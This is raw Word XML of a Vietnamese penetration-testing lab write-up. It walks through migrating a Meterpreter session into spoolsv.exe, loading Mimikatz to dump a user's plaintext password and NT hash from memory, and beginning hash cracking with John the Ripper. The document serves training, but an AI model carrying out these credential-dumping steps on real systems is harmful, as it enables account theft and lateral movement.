    <w:p w14:paraId="52AB3BF3" w14:textId="622AF07D" w:rsidR="0024133B" w:rsidRDefault="009B77F6" w:rsidP="00645AD4">
      <w:r>
        <w:t>Ta</w:t>
      </w:r>
      <w:r w:rsidRPr="009B77F6">
        <w:t xml:space="preserve"> đã thành công nhận được các hàm băm từ máy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
      <w:r w:rsidRPr="009B77F6">
        <w:t xml:space="preserve">, sau đó chúng </w:t>
      </w:r>
      <w:r w:rsidR="00C974CC">
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="009B77F6">
        <w:t xml:space="preserve"> có thể bẻ khóa hoặc sử dụng chúng trong một cuộc tấn công </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pash-the-hash ở phần </w:t>
      </w:r>
      <w:r w:rsidRPr="009B77F6">
        <w:t>sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E174EFF" w14:textId="1D1F648C" w:rsidR="0024133B" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt Mimikatz (Kiwi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021AE9AB" w14:textId="7356938A" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r>
        <w:t>Chuyển qua máy win10, ta sẽ tải một số thông tin xác thực domain vào memory. Ta sẽ giả bộ bgreen đã đăng nhập vào hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD5CAFF" w14:textId="1326172D" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r>
        <w:t>Mở cmd và chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2566E682" w14:textId="7000D400" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AD1FBCF" wp14:editId="0D34EACD">
            <wp:extent cx="6667500" cy="3133725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1773310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0532" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6667500" cy="3133725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71941008" w14:textId="6895A77C" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r>
        <w:t>Một cửa số notepad sẽ hiện ra với quyền hiboxy\bgreen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC921A" w14:textId="5C98DBA1" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806B0BC" w14:textId="77777777" w:rsidR="00A82DFF" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r w:rsidRPr="000759FA">
        <w:t xml:space="preserve">Bây giờ hãy nhắm mục tiêu vào hệ thống Windows. Mimikatz khá an toàn, nhưng chúng ta cần chuyển sang </w:t>
      </w:r>
      <w:r w:rsidR="00A82DFF">
        <w:t>System process</w:t>
      </w:r>
      <w:r w:rsidRPr="000759FA">
        <w:t xml:space="preserve"> để thực hiện việc này. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F6610" w14:textId="2C39FF5F" w:rsidR="009B77F6" w:rsidRDefault="009B77F6" w:rsidP="009B77F6">
      <w:r w:rsidRPr="000759FA">
        <w:t>Thoát khỏi phiên Meterpreter hiện tại (không phải Metasploit) bằng cách nhập exit .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54429A4F" w14:textId="5795E65F" w:rsidR="008325E8" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CB3A2DB" wp14:editId="68DF4E32">
            <wp:extent cx="5810250" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9521715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7157" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5810250" cy="933450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4546D" w14:textId="03BA094D" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13037377" wp14:editId="06716151">
            <wp:extent cx="5086350" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="107756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0984" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5086350" cy="1762125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="585919A5" w14:textId="3279E202" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:t>Confirm thiết lập bằng cách xem show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC80EA8" w14:textId="0A75099A" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:t>Tiến hành khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65FA74" w14:textId="1D908241" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE1ABFD" wp14:editId="295D3F2F">
            <wp:extent cx="6858000" cy="1610360"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1693516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6936" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1610360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5CF5D" w14:textId="0CA8E748" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:t>Kiểm tra thông tin phiên hiện tại bằng sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955D830" w14:textId="08A70ABF" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B53ECA0" wp14:editId="2DA9622F">
            <wp:extent cx="4219575" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="14324192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9281" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4219575" cy="1457325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441BD9D" w14:textId="09C531CC" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="00A82DFF">
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve">Như chúng ta có thể thấy, hệ thống </w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve"> là 64-bit, nhưng bản thân quy trình Meterpreter là 32-bit. Để thực hiện nhiệm vụ tiếp theo, chúng ta cần thực hiện quy trìn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">h SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve">64 bit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791424C5" w14:textId="5784E159" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="00A82DFF">
      <w:r>
        <w:t xml:space="preserve">Chúng ta hãy tìm các tiến trình SYSTEM  </w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve">64 bit trên mục tiêu bằng lệnh ps. Chúng </w:t>
      </w:r>
      <w:r>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve"> cần tìm kiếm các </w:t>
      </w:r>
      <w:r>
        <w:t>tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t xml:space="preserve"> trình 64 bit ( -A x64 ) đang chạy với quyền</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r w:rsidRPr="000E78DD">
        <w:t>( -s ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BD678" w14:textId="16A708F7" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="00A82DFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210FAD4C" wp14:editId="0F408AC9">
            <wp:extent cx="6858000" cy="4394200"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="47500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8856" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4394200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADA381D" w14:textId="7952FE62" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="00A82DFF">
      <w:r w:rsidRPr="00E9605A">
        <w:t xml:space="preserve">Chúng ta cần xác định một </w:t>
      </w:r>
      <w:r>
        <w:t>tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9605A">
        <w:t xml:space="preserve"> trình để di chuyển đến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BCB0E" w14:textId="2C460702" w:rsidR="00A82DFF" w:rsidRDefault="00A82DFF" w:rsidP="008325E8">
      <w:r w:rsidRPr="00740DBA">
        <w:t xml:space="preserve">Trong </w:t>
      </w:r>
      <w:r>
        <w:t>thực tế</w:t>
      </w:r>
      <w:r w:rsidRPr="00740DBA">
        <w:t xml:space="preserve">, khi chọn một </w:t>
      </w:r>
      <w:r>
        <w:t>tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="00740DBA">
        <w:t xml:space="preserve"> trình để di chuyển vào, hãy nghĩ đến các </w:t>
      </w:r>
      <w:r>
        <w:t>tiến</w:t>
      </w:r>
      <w:r w:rsidRPr="00740DBA">
        <w:t xml:space="preserve"> trình sẽ ít có khả năng tác động đáng kể đến hệ thống nếu quy trình đó gặp sự cố. Một lựa chọn phổ biến là spoolsv (Print Spooler), vì nó không cần thiết trên hầu hết các hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C64D77" w14:textId="4FC3B34C" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t>Chuyển sang tiến trình spoolsv.exe bằng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A6C80" w14:textId="15E66DD9" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4410DA00" wp14:editId="5588065E">
            <wp:extent cx="3257550" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="95522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7662" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3257550" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084236F" w14:textId="339F2234" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AEFF882" wp14:editId="4BCC792A">
            <wp:extent cx="4152900" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31148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2780" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId62"/>
                    <a:srcRect t="27700"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4152900" cy="1466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5AA1ED" w14:textId="7F02B8C4" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r w:rsidRPr="00E90504">
        <w:t>Bây giờ chúng ta đang ở quy trình 64-bit, chúng ta có thể tải Mimikatz bằng lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE786E" w14:textId="49A5B4D1" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75168054" wp14:editId="7B45FE83">
            <wp:extent cx="6419850" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4702703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0345" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6419850" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869F34D" w14:textId="29116855" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t>Kiểm tra các câu lệnh hiện có bằng cách chạy help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E086316" w14:textId="4CF94B89" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D3B238" wp14:editId="5E68D3F3">
            <wp:extent cx="5905500" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6214079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7927" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5905500" cy="2381250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06848493" w14:textId="19AB1092" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t xml:space="preserve">Ta thấy có lựa chọn creds_all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9BED35" w14:textId="012062BD" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t>Giờ ta sẽ lấy password từ RAM bằng cách chạy câu lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32755AB1" w14:textId="18CA4C98" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74547FE4" wp14:editId="46CAA6C0">
            <wp:extent cx="6858000" cy="3754755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2146340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0779" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3754755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499287A" w14:textId="24FA6710" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t>Ta đã lấy được mật khẩu của bgreen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A9D71" w14:textId="363CFEF7" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="008325E8">
      <w:r>
        <w:t>Bên cạnh đó, nhìn vào tài khoản sec560 ta sẽ thấy mã băm NT của tài khoản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7537E0" w14:textId="759341D2" w:rsidR="003F61CF" w:rsidRDefault="003F61CF" w:rsidP="003F61CF">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Kết luận</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7EC69" w14:textId="77777777" w:rsidR="00A23BC2" w:rsidRDefault="003F61CF" w:rsidP="003F61CF">
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve">Trong </w:t>
      </w:r>
      <w:r w:rsidR="00A23BC2">
        <w:t>bài lab</w:t>
      </w:r>
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve"> này, </w:t>
      </w:r>
      <w:r w:rsidR="00A23BC2">
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve"> đã chạy m</w:t>
      </w:r>
      <w:r w:rsidR="00A23BC2">
        <w:t>odule</w:t>
      </w:r>
      <w:r w:rsidRPr="003F61CF">
        <w:t xml:space="preserve"> psexec Metasploit, xem xét các tùy chọn cấu hình của nó và phân tích các hoạt động từng bước của nó để thực thi mã trên máy đích. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6CA90" w14:textId="11D2B2EB" w:rsidR="003F61CF" w:rsidRDefault="00A23BC2" w:rsidP="00431D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00A23BC2">
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="00A23BC2">
        <w:lastRenderedPageBreak/>
        <w:t>Lab 3.5: Cracking with John the Ripper and Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1F23B7" w14:textId="2C68D4F1" w:rsidR="00A23BC2" w:rsidRDefault="00A23BC2" w:rsidP="00A23BC2">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE4FE2" w14:textId="1CA9E2AE" w:rsidR="00A23BC2" w:rsidRDefault="00A23BC2" w:rsidP="00A23BC2">
      <w:r>
        <w:t>Sử dụng John the Ripper để crack hashes từ Windows và Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E6E41" w14:textId="0EE6ED6A" w:rsidR="00A23BC2" w:rsidRDefault="00A23BC2" w:rsidP="00A23BC2">
      <w:r>
        <w:t>Sử dụng Hashcat để crack mật khẩu hash từ windows và linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6F9D5" w14:textId="264A2D29" w:rsidR="00A23BC2" w:rsidRDefault="00A23BC2" w:rsidP="00A23BC2">
      <w:r>
        <w:t xml:space="preserve">Phân tích cách mà Hashcat </w:t>
      </w:r>
      <w:r w:rsidR="00B91294">
        <w:t xml:space="preserve">rules </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">giúp </w:t>
      </w:r>
      <w:r w:rsidR="00B91294">
        <w:t xml:space="preserve">cho </w:t>
      </w:r>
      <w:r>
        <w:t>việc giải mã hash có tỷ lệ thành công cao hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779ED39F" w14:textId="563247B2" w:rsidR="00A23BC2" w:rsidRDefault="00A23BC2" w:rsidP="00A23BC2">
      <w:r>
        <w:t>So sánh Hashcat</w:t>
      </w:r>
      <w:r w:rsidR="00996D55">
        <w:t xml:space="preserve"> và John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF3F9F" w14:textId="612EF941" w:rsidR="00996D55" w:rsidRDefault="00996D55" w:rsidP="00996D55">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125C0E52" w14:textId="01CB5FB3" w:rsidR="00996D55" w:rsidRDefault="00996D55" w:rsidP="00996D55">
      <w:r>
        <w:t>Máy ảo sử dụng: Slingshot linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F72C8" w14:textId="784CD271" w:rsidR="00996D55" w:rsidRDefault="00996D55" w:rsidP="00996D55">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E27973E" w14:textId="1742F2F1" w:rsidR="00996D55" w:rsidRDefault="00BF74F2" w:rsidP="00996D55">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đánh giá hiệu suất</w:t>
      </w:r>
      <w:r w:rsidR="00996D55">
        <w:t xml:space="preserve"> John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C99DB" w14:textId="7F65043A" w:rsidR="00996D55" w:rsidRDefault="00996D55" w:rsidP="00996D55">
      <w:r>
        <w:t>Chạy John trong test mode và kiểm tra một số kiểu hash khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F690CDA" w14:textId="21A1CD84" w:rsidR="00996D55" w:rsidRDefault="009B6E91" w:rsidP="00996D55">
      <w:r>
        <w:t>Chúng ta hãy xem xem tốc độ mà John có thể bẻ khóa mật khẩu LM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68519C3C" w14:textId="77777777" w:rsidR="00247ABC" w:rsidRDefault="00247ABC" w:rsidP="00996D55">
      <w:r w:rsidRPr="00247ABC">
        <w:t>Trong trường hợp này</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CF9E2B" w14:textId="77777777" w:rsidR="00247ABC" w:rsidRDefault="00247ABC" w:rsidP="00247ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00247ABC">
        <w:t xml:space="preserve">--test là một tùy chọn để kiểm tra hiệu suất của các thuật toán hash mật khẩu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918BFEB" w14:textId="5FBB92FE" w:rsidR="009B6E91" w:rsidRDefault="00247ABC" w:rsidP="00247ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00247ABC">
        <w:t>--format=lm chỉ định sử dụng định dạng LAN Manager (LM)</w:t>
      </w:r>
      <w:r w:rsidR="00BF74F2">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C36DD8">
        <w:t>caps,</w:t>
      </w:r>
      <w:r w:rsidR="00BF74F2">
        <w:t>14kt</w:t>
      </w:r>
      <w:r w:rsidR="00C36DD8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BF74F2">
        <w:t>pad,/2,DES,gộp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3C63D" w14:textId="64546F6B" w:rsidR="00247ABC" w:rsidRDefault="00247ABC" w:rsidP="00247ABC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
